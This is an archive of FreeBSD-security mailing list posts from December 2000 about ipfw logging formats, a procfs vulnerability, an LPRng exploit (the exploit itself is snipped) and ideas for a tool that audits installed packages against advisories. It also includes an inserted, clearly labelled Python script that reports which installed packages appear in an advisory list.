Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id EBA0C37B400 for ; Thu, 14 Dec 2000 20:43:59 -0800 (PST) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id PAA19298; Fri, 15 Dec 2000 15:43:48 +1100 (EST) 
From: Darren Reed Message-Id: <200012150443.PAA19298@caligula.anu.edu.au> Subject: Re: Extended ipfw Logging To: Gerhard.Sittig@gmx.net (Gerhard Sittig) Date: Fri, 15 Dec 2000 15:43:48 +1100 (Australia/ACT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20001214205854.J253@speedy.gsinet> from "Gerhard Sittig" at Dec 14, 2000 08:58:54 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: avalon@caligula.anu.edu.au Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Gerhard Sittig, sie said: [...] > > WHAT THE PATCHES DO > > > > There are new fields for all packets. Data from the IP header, > > the IP ID, TTL, and extra fragmentation information is printed > > for all types of datagrams. TCP packets include additional > > information on sequence number, acknowledgement number, and > > flags. > > Why not have the "verbosity" written in the matching rule? One > surely doesn't want to bloat *all* logged entries (not even log > all denials, and maybe log some accepted packets too). Expand > the filter description for the log verbosity level and reference > this field when the match is meant to log something. > > I'm not saying that ipf(4) is the cure for everything. But > looking at "man 5 ipf" here's what I really like about it and you > might, too: > > log = "log" [ "body" ] [ "first" ] [ "or-block" ] [ "level" loglevel ] . > > Although the above "loglevel" is different from your verbosity > idea (it's a syslog facility.level pair) you might want to have > the best of both worlds in ipfw(4) and code syslog levels as well > as your verbosity controlling what packet characteristics to > print out and where to do so? :) Well, I should point out that the output you see for ipfilter logs is generated (usually) by ipmon. If you changed that and that alone, you could have it display every field in the TCP/IP headers. 
An alternative to generating log information with "ipmon -Ds" or "ipmon -D /var/log/ipflog" is to do "cat /dev/ipl > /var/log/ipflog" and then generate text from the binary with "ipmon -stf /var/log/ipflog". Hmmm....I should add a standard option to ipmon which saves the binary log data to one file and does something else with the text. That way you get the "summary" of the important data as text via syslog or some other means as well as the complete details in the binary file. Getting back to what you are discussing here, the problem I have with variable verbosity is the text then becomes irregular for the purpose of parsing and analysis. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 22:28:10 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 22:28:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 4831637B400 for ; Thu, 14 Dec 2000 22:28:08 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id WAA02135; Thu, 14 Dec 2000 22:27:42 -0800 Date: Thu, 14 Dec 2000 22:27:42 -0800 
From: Kris Kennaway To: Cy Schubert - ITSD Open Systems Group Cc: John Howie , security@FreeBSD.ORG Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) Message-ID: <20001214222742.C2040@citusc.usc.edu> References: <20001214082814.A25963@citusc.usc.edu> <200012142108.eBEL8wo04627@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="oJ71EGRlYNjSvfq7" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200012142108.eBEL8wo04627@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Thu, Dec 14, 2000 at 01:08:47PM -0800 Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --oJ71EGRlYNjSvfq7 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Dec 14, 2000 at 01:08:47PM -0800, Cy Schubert - ITSD Open Systems Group wrote: > Has the fix been committed? If so, is it procfs_ctl.c 1.22? Several fixes have been committed to -stable, the remaining problem was fixed in -current probably in that CVS revision, but when I last checked my commit mail it hadn't been fixed in 4.x (Robert has a different patch which will be committed shortly, because of 5.0/4.x differences) Kris --oJ71EGRlYNjSvfq7 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6ObnbWry0BWjoQKURAt96AJ9T1RBveOWK4VtC1dlmpdP1csI2JACdFWJF dz7t0V6Q+P6dySQnCLhZF50= =LsMU -----END PGP SIGNATURE----- --oJ71EGRlYNjSvfq7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 22:31:49 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 22:31:47 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) 
with ESMTP id 7EF7E37B400 for ; Thu, 14 Dec 2000 22:31:47 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id WAA02173; Thu, 14 Dec 2000 22:31:11 -0800 Date: Thu, 14 Dec 2000 22:31:11 -0800 
From: Kris Kennaway To: Chris Faulhaber Cc: Cy Schubert - ITSD Open Systems Group , desmo@bandwidth.org, freebsd-security@FreeBSD.ORG Subject: Re: LPRng remote root exploit (fwd) Message-ID: <20001214223111.D2040@citusc.usc.edu> References: <200012150131.eBF1VPa05764@cwsys.cwsent.com> <20001214205749.A48180@peitho.fxp.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="IMjqdzrDRly81ofr" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001214205749.A48180@peitho.fxp.org>; from jedgar@fxp.org on Thu, Dec 14, 2000 at 08:57:49PM -0500 Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --IMjqdzrDRly81ofr Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Dec 14, 2000 at 08:57:49PM -0500, Chris Faulhaber wrote: > On Thu, Dec 14, 2000 at 05:30:52PM -0800, Cy Schubert - ITSD Open Systems Group wrote: > > This is just a heads up. > > > > Anyone care to test this with our LPRng port? > > > *snip* > > > > LPRng-3.6.22/23/24 remote root exploit, enjoy. > > > *snip* > > > It won't hurt to try, however, ports/sysutils/LPRng is > at 3.6.26, which is supposed to fix this problem. Yes, I believe so. See the advisory of a month or so ago. 
Kris --IMjqdzrDRly81ofr Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6ObqtWry0BWjoQKURAuF/AJ9cy9cp4Gb3dT8W4LwzBXO9Bm5LhgCg3gp8 4hyw7YzhZFETzdkVg8nA1OQ= =NHDD -----END PGP SIGNATURE----- --IMjqdzrDRly81ofr-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 22:32: 3 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 22:32:00 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 62B7637B402 for ; Thu, 14 Dec 2000 22:32:00 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id WAA02269; Thu, 14 Dec 2000 22:33:17 -0800 Date: Thu, 14 Dec 2000 22:33:17 -0800 
From: Kris Kennaway To: jrz Cc: security@FreeBSD.ORG Subject: Re: procfs vulnerability (Re: Details of www.freebsd.org penetration) Message-ID: <20001214223317.E2040@citusc.usc.edu> References: <20001214200810.2EA6337B400@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001214200810.2EA6337B400@hub.freebsd.org>; from jrz@cnmnetwork.com on Thu, Dec 14, 2000 at 12:21:06PM -0800 Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Dec 14, 2000 at 12:21:06PM -0800, jrz wrote: > >unmount procfs now on > >your multi-user systems. > > > >Kris > > Kris, > > What versions of FreeBSD is this affecting at this time? It's complicated..wait for the advisory. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Dec 15 12:16:14 2000 From owner-freebsd-security@FreeBSD.ORG Fri Dec 15 12:16:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 9D79437B404 for ; Fri, 15 Dec 2000 12:16:07 -0800 (PST) Received: (qmail 12769 invoked by uid 0); 15 Dec 2000 20:16:06 -0000 Received: from p3ee21663.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.99) by mail.gmx.net (mail07) with SMTP; 15 Dec 2000 20:16:06 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id SAA12031 for freebsd-security@FreeBSD.ORG; Fri, 15 Dec 2000 18:41:51 +0100 Date: Fri, 15 Dec 2000 18:41:51 +0100 
From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: Extended ipfw Logging Message-ID: <20001215184150.K253@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20001214205854.J253@speedy.gsinet> <200012150443.PAA19298@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200012150443.PAA19298@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Fri, Dec 15, 2000 at 03:43:48PM +1100 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Dec 15, 2000 at 15:43 +1100, Darren Reed wrote: > In some mail from Gerhard Sittig, sie said: > > > > Why not have the "verbosity" written in the matching rule? > > One surely doesn't want to bloat *all* logged entries (not > > even log all denials, and maybe log some accepted packets > > too). > > Getting back to what you are discussing here, the problem I > have with variable verbosity is the text then becomes irregular > for the purpose of parsing and analysis. The most probable (from my POV) application for different verbosity depending on the matching rule would be to, say, log some UDP packets with "log body" while just doing "log" or "log first" for the fact that some TCP packet was dropped -- since the first TCP packet (SYN) doesn't contain level 5+ payload and reading the body in hex is not any more informative than reading its textual representation of the header immediately above. Speaking of "irregular log text layout" we already have this. :) The "Nx" for repeated matches between the timestamp and the interface name does already shift the rest of the line. Maybe those log lines without the count number should have a place holder, too? But then one could start printing IPs with "maximum width" etc to have everything aligned for the (human) reader. I see, thinking about this is getting endless ... 
And maybe I'm just missing how the verbosity level differs from the "simple" (since two stage only) header / header + body logging.

Maybe having ipfw log a line like it does now and maybe printing a "continuation line" with additional data when asked to do so in the matching rule would be a way to go.

virtually yours   82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.

From owner-freebsd-security Fri Dec 15 16:16:32 2000
From: "Some Person"
To: freebsd-security@freebsd.org
Subject: Security Update Tool..
Date: Sat, 16 Dec 2000 00:16:29

Hey ppl. Sorry I just joined the list so I dunno what kinda posts usually go on here but I was just browsing www.freebsd.org/security and...

Well, seeing there's new security discoveries, patches and a whole slew of CERT advisories etc.. it's hard to keep up with what needs securing, and what to secure, from the base system, from the ports, etc.

My question is, is there a util yet that in theory (maybe if so, or if someone writes one would work differently than what I'm imagining) queries a central database with all the security advisories, checks the local system for comparisons and vulnerabilities against that database and reports to the user who ran the util.

ie, sacheck -H sa-host.freebsd.org

I completely made that up, but just an idea. ie, sacheck (security advisor check) checks against -H sa-host.freebsd.org.

Please, if I sound like a complete idiot, no need to flame.. ;) I'm trying to explain what I think would be a good idea in the best way I can via email and I'm still an intermediate (non-expert) FreeBSD user. I don't know programming (yet) so I probably don't have all the terms, but I do have ideas.

ps: Hope I did make at least some sense in describing my idea.

Thanks!
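The utility asked for in this post, as an added example that is not part of the original message or of any FreeBSD tool: a report-only check that matches `pkg_info`-style `name-version` lines against an advisory list held locally. The feed format, the `EXAMPLE-SA-*` ids, the package versions and every function name are constructed for illustration, and the version ordering is a simplification.

```python
"""Report-only package audit: compare installed packages with an advisory list.

Matching is done locally against a fetched copy of the list, so no host is
told which package versions this machine runs.
"""
import re
from typing import NamedTuple

# Constructed sample of `pkg_info` output: "<name>-<version>  <comment>".
SAMPLE_PKG_INFO = """\
wu-ftpd-2.6.0    FTP daemon (version constructed for the example)
examplechat-1.0c17    chat client (constructed)
bash-2.04    shell (constructed)
ja-less-358_1    pager with a port revision (constructed)
"""

# Hypothetical advisory feed, one record per line:
#   package|first fixed version|advisory id|summary
SAMPLE_ADVISORIES = """\
# constructed records, not real advisories
wu-ftpd|2.6.1|EXAMPLE-SA-01|constructed record
examplechat|1.0c17|EXAMPLE-SA-02|constructed record
ja-less|358_2|EXAMPLE-SA-03|constructed record
notinstalled|1.0|EXAMPLE-SA-04|constructed record
"""

# version[_revision][,epoch]; anything else is reported for manual review.
VERSION_RE = re.compile(r"([^_,]+)(?:_(\d+))?(?:,(\d+))?")


class Package(NamedTuple):
    name: str
    version: str


class Advisory(NamedTuple):
    package: str
    fixed_in: str
    ident: str
    summary: str


def parse_pkg_info(text):
    """Split each line's first token at its last hyphen into name and version."""
    packages = []
    for line in text.splitlines():
        if not line.strip():
            continue
        name, sep, version = line.split(None, 1)[0].rpartition("-")
        if sep and name and version:  # skip tokens that are not name-version
            packages.append(Package(name, version))
    return packages


def parse_advisories(text):
    """Read 'package|fixed|id|summary' records, skipping comments and junk."""
    advisories = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = [f.strip() for f in line.split("|", 3)]
        if len(fields) == 4:
            advisories.append(Advisory(*fields))
    return advisories


def version_key(version):
    """Sortable key: epoch first, then dotted/lettered chunks, then revision."""
    m = VERSION_RE.fullmatch(version)
    if m is None:
        raise ValueError(f"unrecognised version: {version!r}")
    base, revision, epoch = m.groups()
    # Numeric chunks compare as integers; letter chunks sort below numbers.
    chunks = [(1, int(num), "") if num else (0, 0, alpha)
              for num, alpha in re.findall(r"(\d+)|([A-Za-z]+)", base)]
    return (int(epoch or 0), chunks, int(revision or 0))


def audit(pkg_info_text, advisory_text):
    """Stage one only: say what is affected and why; change nothing."""
    installed = {p.name.lower(): p for p in parse_pkg_info(pkg_info_text)}
    findings = []
    for adv in parse_advisories(advisory_text):
        pkg = installed.get(adv.package.lower())
        if pkg is None:
            continue
        try:
            affected = version_key(pkg.version) < version_key(adv.fixed_in)
        except ValueError:
            # Never guess on a version we cannot order; surface it instead.
            findings.append((pkg.name, pkg.version, adv.ident, "CHECK BY HAND"))
            continue
        if affected:
            findings.append((pkg.name, pkg.version, adv.ident,
                             f"upgrade to {adv.fixed_in} or later"))
    return findings


if __name__ == "__main__":
    for name, version, ident, action in audit(SAMPLE_PKG_INFO, SAMPLE_ADVISORIES):
        print(f"{name}-{version}: {ident}: {action}")
```
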

From owner-freebsd-security Fri Dec 15 16:21:59 2000
Date: Sat, 16 Dec 2000 01:21:34 +0100
From: Szilveszter Adam
To: freebsd-security@freebsd.org
Subject: Re: Security Update Tool..
Message-ID: <20001216012134.B2400@petra.hos.u-szeged.hu>
In-Reply-To: ; from ntvsunix@hotmail.com on Sat, Dec 16, 2000 at 12:16:29AM +0000

On Sat, Dec 16, 2000 at 12:16:29AM +0000, Some Person wrote:
> Hey ppl. Sorry I just joined the list so I dunno what kinda posts usually go
> on here but I was just browsing www.freebsd.org/security and...
>
> Well, seeing there's new security discoveries, patches and a whole slew of
> CERT advisories etc.. it's hard to keep up with what needs securing, and
> what to secure, from the base system, from the ports, etc.
>
> My question is, is there a util yet that in theory (maybe if so, or if
> someone writes one would work differently than what I'm imagining) queries a
> central database with all the security advisories, checks the local system
> for comparisons and vulnerabilities against that database and reports to the
> user who ran the util.
>
> ie, sacheck -H sa-host.freebsd.org

Such thing already exists for NetBSD, at least for pkgs/pkgsrc.
--
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary

From owner-freebsd-security Fri Dec 15 16:22:26 2000
Date: Fri, 15 Dec 2000 16:22:22 -0800
From: Alfred Perlstein
To: Some Person
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Security Update Tool..
Message-ID: <20001215162222.P19572@fw.wintelcom.net>
In-Reply-To: ; from ntvsunix@hotmail.com on Sat, Dec 16, 2000 at 12:16:29AM +0000

* Some Person [001215 16:16] wrote:
> Hey ppl. Sorry I just joined the list so I dunno what kinda posts usually go
> on here but I was just browsing www.freebsd.org/security and...

It's usually a good idea to read the list charter and watch a couple of emails go by before posting to it. Your post seems pretty much on topic though.

> Well, seeing there's new security discoveries, patches and a whole slew of
> CERT advisories etc.. it's hard to keep up with what needs securing, and
> what to secure, from the base system, from the ports, etc.
>
> My question is, is there a util yet that in theory (maybe if so, or if
> someone writes one would work differently than what I'm imagining) queries a
> central database with all the security advisories, checks the local system
> for comparisons and vulnerabilities against that database and reports to the
> user who ran the util.
>
> ie, sacheck -H sa-host.freebsd.org
>
> I completely made that up, but just an idea. ie, sacheck (security advisor
> check) checks against -H sa-host.freebsd.org.
>
> Please, if I sound like a complete idiot, no need to flame.. ;) I'm trying
> to explain what I think would be a good idea in the best way I can via email
> and I'm still an intermediate (non-expert) FreeBSD user. I don't know
> programming (yet) so I probably don't have all the terms, but I do have ideas.
>
> ps: Hope I did make at least some sense in describing my idea.

It's actually a very good idea.
On FreeBSD you can output the name/version of all the installed packages just by typing 'pkg_info'; if someone were to set up a website with a simple database one could just make http requests to it about each installed package.

Now the question is...

If you just asked someone if your version of wu-ftpd is safe or not, and they know the source IP... can you trust them? :)

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."

From owner-freebsd-security Fri Dec 15 16:28:30 2000
Date: Fri, 15 Dec 2000 16:41:31 -0800 (PST)
From: jrz
Reply-To: jrz
Subject: Re: Security Update Tool..
To: security@freebsd.org
Message-Id: <20001216002828.519FB37B400@hub.freebsd.org>

>> My question is, is there a util yet that in theory (maybe if so, or if
>> someone writes one would work differently than what I'm imagining) queries a
>> central database with all the security advisories, checks the local system
>> for comparisons and vulnerabilities against that database and reports to the
>> user who ran the util.
>>
>> ie, sacheck -H sa-host.freebsd.org

would be fairly easy to write a shell or perl script that checks for current advisories and prints it out in pretty format.

-jrz

---
Jacob Zehnder | Systems Engineer
CNM Network | http://www.cnmnetwork.com
business: jrz@cnmnetwork.com
other: jrz@rackmount.org
---
"Where am I, and what am I doing in this handbasket?"

From owner-freebsd-security Fri Dec 15 16:42:44 2000
Date: Fri, 15 Dec 2000 16:42:43 -0800 (PST)
From: Anil Jangity
To: jrz
Subject: Re: Security Update Tool..
In-Reply-To: <20001216002828.519FB37B400@hub.freebsd.org>

I think he was looking for something a little more "automated". Something like IE's "Window's update" for freebsd ;-)

I don't think it's too difficult to do this, all you do is do ident on any binaries that are on the local system and compare the version with the version string in the advisories... the advisory might need some formatting changes?

just thinking out loud.

Fri, 15 Dec 2000 (4:41pm -0800) Message:

@ >> My question is, is there a util yet that in theory (maybe if so, or if
@ >> someone writes one would work differently than what I'm imagining) queries a
@ >> central database with all the security advisories, checks the local system
@ >> for comparisons and vulnerabilities against that database and reports to the
@ >> user who ran the util.
@ >>
@ >> ie, sacheck -H sa-host.freebsd.org
@
@ would be fairly easy to write a shell or perl script that checks for current
@ advisories and prints it out in pretty format.
@
@ -jrz
@
@ ---
@ Jacob Zehnder | Systems Engineer
@ CNM Network | http://www.cnmnetwork.com
@ business: jrz@cnmnetwork.com
@ other: jrz@rackmount.org
@ ---
@ "Where am I, and what am I doing in this handbasket?"

From owner-freebsd-security Fri Dec 15 16:44: 9 2000
Message-ID: <005e01c066f8$9da172a0$fa5e78cb@gchang>
From: "James Lim"
To: "Anil Jangity" , "jrz"
Subject: Re: Security Update Tool..
Date: Sat, 16 Dec 2000 08:39:14 +0800

Hi all,
brilliant idea

James Lim
Technical Support Executive

Pacific Internet Limited
89 Science Park Drive
#02-05/06 The Rutherford
Singapore 118261

Finger evilfry@sg.freebsd.org for PGP key.

----- Original Message -----
From: "Anil Jangity"
To: "jrz"
Sent: Saturday, December 16, 2000 8:42 AM
Subject: Re: Security Update Tool..

> I think he was looking for something a little more "automated". Something
> like IE's "Window's update" for freebsd ;-)
>
> I don't think it's too difficult to do this, all you do is do ident on any
> binaries that are on the local system and compare the version with the
> version string in the advisories... the advisory might need some
> formatting changes?
>
> just thinking out loud.
>
>
> Fri, 15 Dec 2000 (4:41pm -0800) Message:
>
> @ >> My question is, is there a util yet that in theory (maybe if so, or if
> @ >> someone writes one would work differently than what I'm imagining) queries a
> @ >> central database with all the security advisories, checks the local system
> @ >> for comparisons and vulnerabilities against that database and reports to the
> @ >> user who ran the util.
> @ >>
> @ >> ie, sacheck -H sa-host.freebsd.org
> @
> @ would be fairly easy to write a shell or perl script that checks for current
> @ advisories and prints it out in pretty format.
> @
> @ -jrz
> @
> @ ---
> @ Jacob Zehnder | Systems Engineer
> @ CNM Network | http://www.cnmnetwork.com
> @ business: jrz@cnmnetwork.com
> @ other: jrz@rackmount.org
> @ ---
> @ "Where am I, and what am I doing in this handbasket?"

From owner-freebsd-security Fri Dec 15 17: 1: 1 2000
Date: Fri, 15 Dec 2000 20:00:47 -0500 (EST)
From: Mikhail Kruk
To: Anil Jangity
Cc: jrz ,
Subject: Re: Security Update Tool..

I'm not sure that many people would like that kind of automation, but what is really missing IMHO is ability to mark ports which are insecure and add some option to pkg_info which will check all installed packages. I think OpenBSD has exactly this, no?

> I think he was looking for something a little more "automated". Something
> like IE's "Window's update" for freebsd ;-)
>
> I don't think it's too difficult to do this, all you do is do ident on any
> binaries that are on the local system and compare the version with the
> version string in the advisories... the advisory might need some
> formatting changes?
>
> just thinking out loud.
>
>
> Fri, 15 Dec 2000 (4:41pm -0800) Message:
>
> @ >> My question is, is there a util yet that in theory (maybe if so, or if
> @ >> someone writes one would work differently than what I'm imagining) queries a
> @ >> central database with all the security advisories, checks the local system
> @ >> for comparisons and vulnerabilities against that database and reports to the
> @ >> user who ran the util.
> @ >>
> @ >> ie, sacheck -H sa-host.freebsd.org
> @
> @ would be fairly easy to write a shell or perl script that checks for current
> @ advisories and prints it out in pretty format.
> @
> @ -jrz
> @
> @ ---
> @ Jacob Zehnder | Systems Engineer
> @ CNM Network | http://www.cnmnetwork.com
> @ business: jrz@cnmnetwork.com
> @ other: jrz@rackmount.org
> @ ---
> @ "Where am I, and what am I doing in this handbasket?"

From owner-freebsd-security Fri Dec 15 17: 3:25 2000
Message-ID: <007901c066fb$4f187040$fa5e78cb@gchang>
From: "James Lim"
To: "Mikhail Kruk" , "Anil Jangity"
Cc: "jrz" ,
Subject: Re: Security Update Tool..
Date: Sat, 16 Dec 2000 08:58:30 +0800

Hi,
Some of the ports are actually marked forbidden due to the security hazards. That is served as a warning to users. But of course if they want to risk it they just have to comment it

James Lim
Technical Support Executive

Pacific Internet Limited
89 Science Park Drive
#02-05/06 The Rutherford
Singapore 118261

Finger evilfry@sg.freebsd.org for PGP key.

----- Original Message -----
From: "Mikhail Kruk"
To: "Anil Jangity"
Cc: "jrz" ;
Sent: Saturday, December 16, 2000 9:00 AM
Subject: Re: Security Update Tool..

> I'm not sure that many people would like that kind of automation, but what
> is really missing IMHO is ability to mark ports which are insecure and
> add some option to pkg_info which will check all installed packages. I
> think OpenBSD has exactly this, no?
>
> > I think he was looking for something a little more "automated". Something
> > like IE's "Window's update" for freebsd ;-)
> >
> > I don't think it's too difficult to do this, all you do is do ident on any
> > binaries that are on the local system and compare the version with the
> > version string in the advisories... the advisory might need some
> > formatting changes?
> >
> > just thinking out loud.
> >
> >
> > Fri, 15 Dec 2000 (4:41pm -0800) Message:
> >
> > @ >> My question is, is there a util yet that in theory (maybe if so, or if
> > @ >> someone writes one would work differently than what I'm imagining) queries a
> > @ >> central database with all the security advisories, checks the local system
> > @ >> for comparisons and vulnerabilities against that database and reports to the
> > @ >> user who ran the util.
> > @ >>
> > @ >> ie, sacheck -H sa-host.freebsd.org
> > @
> > @ would be fairly easy to write a shell or perl script that checks for current
> > @ advisories and prints it out in pretty format.
> > @
> > @ -jrz
> > @
> > @ ---
> > @ Jacob Zehnder | Systems Engineer
> > @ CNM Network | http://www.cnmnetwork.com
> > @ business: jrz@cnmnetwork.com
> > @ other: jrz@rackmount.org
> > @ ---
> > @ "Where am I, and what am I doing in this handbasket?"

From owner-freebsd-security Fri Dec 15 17: 5:11 2000
Date: Fri, 15 Dec 2000 20:05:06 -0500 (EST)
From: Matt Heckaman
To: Alfred Perlstein
Cc: FreeBSD-SECURITY
Subject: Re: Security Update Tool..
In-Reply-To: <20001215162222.P19572@fw.wintelcom.net>

On Fri, 15 Dec 2000, Alfred Perlstein wrote:
...
: If you just asked someone if your version of wu-ftpd is safe or not,
: and they know the source IP... can you trust them? :)

Maybe yes, maybe no; however if you're running a vulnerable daemon, it's quite moot since the mass-ip-block-scanning script kiddies will find it within a week anyways. :)

* Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ *
* GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 *

From owner-freebsd-security Fri Dec 15 17: 5:19 2000
Date: Fri, 15 Dec 2000 20:05:08 -0500 (EST)
From: Mikhail Kruk
To: James Lim
Cc: Anil Jangity , jrz ,
Subject: Re: Security Update Tool..
In-Reply-To: <007901c066fb$4f187040$fa5e78cb@gchang>

um... marking port forbidden will prevent you from installing it, but is there ability to audit ports you have already installed?

> Hi,
> Some of the ports are actually marked forbidden due to the security
> hazards. That is served as a warning to users. But of course if they want to
> risk it they just have to comment it
>
> James Lim
> Technical Support Executive
>
> Pacific Internet Limited
> 89 Science Park Drive
> #02-05/06 The Rutherford
> Singapore 118261

From owner-freebsd-security Fri Dec 15 17: 7:22 2000
Message-ID: <008d01c066fb$ddf63ae0$fa5e78cb@gchang>
From: "James Lim"
To: "Mikhail Kruk"
Cc: "Anil Jangity" , "jrz" ,
Subject: Re: Security Update Tool..
Date: Sat, 16 Dec 2000 09:02:31 +0800

No, that was just in response to marking ports that are insecure :)

cheers

James Lim
Technical Support Executive

Pacific Internet Limited
89 Science Park Drive
#02-05/06 The Rutherford
Singapore 118261

Finger evilfry@sg.freebsd.org for PGP key.

----- Original Message -----
From: "Mikhail Kruk"
To: "James Lim"
Cc: "Anil Jangity" ; "jrz" ;
Sent: Saturday, December 16, 2000 9:05 AM
Subject: Re: Security Update Tool..

> um... marking port forbidden will prevent you from installing it, but is
> there ability to audit ports you have already installed?
>
> > Hi,
> > Some of the ports are actually marked forbidden due to the security
> > hazards. That is served as a warning to users. But of course if they want to
> > risk it they just have to comment it
> >
> > James Lim
> > Technical Support Executive
> >
> > Pacific Internet Limited
> > 89 Science Park Drive
> > #02-05/06 The Rutherford
> > Singapore 118261

From owner-freebsd-security Fri Dec 15 17:10:21 2000
Date: Fri, 15 Dec 2000 20:10:18 -0500
From: Chris Faulhaber
To: Mikhail Kruk
Cc: James Lim , security@FreeBSD.ORG
Subject: Re: Security Update Tool..
Message-ID: <20001215201018.A90289@peitho.fxp.org>
References: <007901c066fb$4f187040$fa5e78cb@gchang>
In-Reply-To: ; from meshko@cs.brandeis.edu on Fri, Dec 15, 2000 at 08:05:08PM -0500

On Fri, Dec 15, 2000 at 08:05:08PM -0500, Mikhail Kruk wrote:
> um... marking port forbidden will prevent you from installing it, but is
> there ability to audit ports you have already installed?
>

Not exactly, though pkg_version(1) will tell you what packages require updating.

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Fri Dec 15 17:57:46 2000
Date: Fri, 15 Dec 2000 20:59:43 -0500 (EST)
From: Jeff Gentry
To: Mikhail Kruk
Cc: Anil Jangity , jrz , security@FreeBSD.ORG
Subject: Re: Security Update Tool..

On Fri, 15 Dec 2000, Mikhail Kruk wrote:
> I'm not sure that many people would like that kind of automation, but what
> is really missing IMHO is ability to mark ports which are insecure and
> add some option to pkg_info which will check all installed packages. I
> think OpenBSD has exactly this, no?

I don't think it has to be automated *and* "behind the covers" ... I think a 2 stage process would be good -> first stage figures out what (if any) you need, and if possible, explains why. The 2nd stage would allow you to apply changes if you wanted to or not.

--
Jeff Gentry jester@hexdump.org gentrj@hexdump.org
SEX DRUGS UNIX

From owner-freebsd-security Fri Dec 15 18: 9:58 2000
Message-ID: <00a701c06704$9ae4f440$fa5e78cb@gchang>
From: "James Lim"
To: "Jeff Gentry" , "Mikhail Kruk"
Cc: "Anil Jangity" , "jrz" ,
Subject: Re: Security Update Tool..
Date: Sat, 16 Dec 2000 10:05:03 +0800

Hi all,
Seems like today we have 2 ideas, ports autoupdate utility ( security checks too ) as well as for the src base itself?

James Lim
Technical Support Executive

Pacific Internet Limited
89 Science Park Drive
#02-05/06 The Rutherford
Singapore 118261

